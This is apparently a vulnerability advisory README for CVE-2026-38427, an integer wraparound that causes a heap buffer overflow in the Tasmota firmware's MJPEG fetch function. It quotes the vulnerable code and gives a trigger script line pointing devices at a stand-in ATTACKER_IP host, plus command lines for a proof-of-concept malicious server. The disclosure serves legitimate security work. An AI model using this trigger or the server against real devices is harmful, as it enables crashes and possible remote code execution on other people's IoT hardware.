sermikr0/CVE-2026-38427

# CVE-2026-38427: Integer Wraparound → Heap Buffer Overflow in Tasmota fetch_jpg() **CVE:** CVE-2026-38427 **Severity:** Critical (CVSS 9.8) **Product:** Arendst Tasmota **Affected Version:** <= 15.3.0.3 **File:** `tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino` **Function:** `fetch_jpg()` — case 2 (MJPEG frame fetch) **Author:** Saidakbarxon Maxsudxonov **Disclosure:** Responsible — reported to Tasmota before publication ## Summary ## Vulnerable Code // tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino // Case 2: fetch next MJPEG frame char inbuff[64]; stream.readBytesUntil('\n', inbuff, sizeof(inbuff)); // reads "Content-Length: 70000" char *cp = strchr(inbuff, ':'); uint16_t size = 0; if (cp) { size = atoi(cp + 1); // atoi() returns int 70000 // IMPLICIT TRUNCATION: uint16_t = 70000 & 0xFFFF = 4464 } uint8_t *buff = (uint8_t *)special_malloc(size); // malloc(4464) — too small! if (buff) { stream.readBytes(buff, size); // reads only 4464 bytes // 65536 bytes remain in stream → corruption } ## Integer Wraparound Table | Content-Length (header) | uint16_t value | Buffer allocated | Bytes unread | |------------------------|---------------|-----------------|-------------| | 65536 | 0 | 0 (skipped) | 65536 | | 65537 | 1 | 1 byte | 65536 | | 70000 | 4464 | 4464 bytes | 65536 | | 131072 | 0 | 0 (skipped) | 131072 | ## Attack Scenario An attacker who can make a Tasmota device connect to their HTTP server (via a malicious Tasmota script or MITM) can send MJPEG frames with `Content-Length` values exceeding 65535. The device will: 1. Allocate a small buffer (wrapped value) 2. Read only a fraction of the data 3. Leave remaining bytes corrupting the HTTP/WiFi stream state 4. Crash or exhibit undefined behavior leading to potential RCE **Trigger via Tasmota script:** >D >B fetchjp(ATTACKER_IP:PORT/stream,0,0,1) >1 =fetchjp(2,0,0,1) ## Proof of Concept The PoC runs a fake MJPEG HTTP server that sends frames with malicious `Content-Length` values: python3 CVE-2026-38427_poc.py --port 8889 --cl 65537 python3 CVE-2026-38427_poc.py --port 8889 --cl 131072 See [CVE-2026-38427_poc.py](CVE-2026-38427_poc.py) for full implementation. ## Impact - **Confidentiality:** High (RCE possible on ESP32) - **Integrity:** High - **Availability:** High (guaranteed crash/reboot) - **Attack Vector:** Network - **Authentication:** None required (device must be scripted to connect to attacker server) ## Timeline - **2026-03-29:** Vulnerability discovered and reported to MITRE - **2026-03-29:** CVE-2026-38427 assigned - **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+) ## References - [Tasmota GitHub](https://github.com/arendst/Tasmota) - [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino) - CVE-2026-38427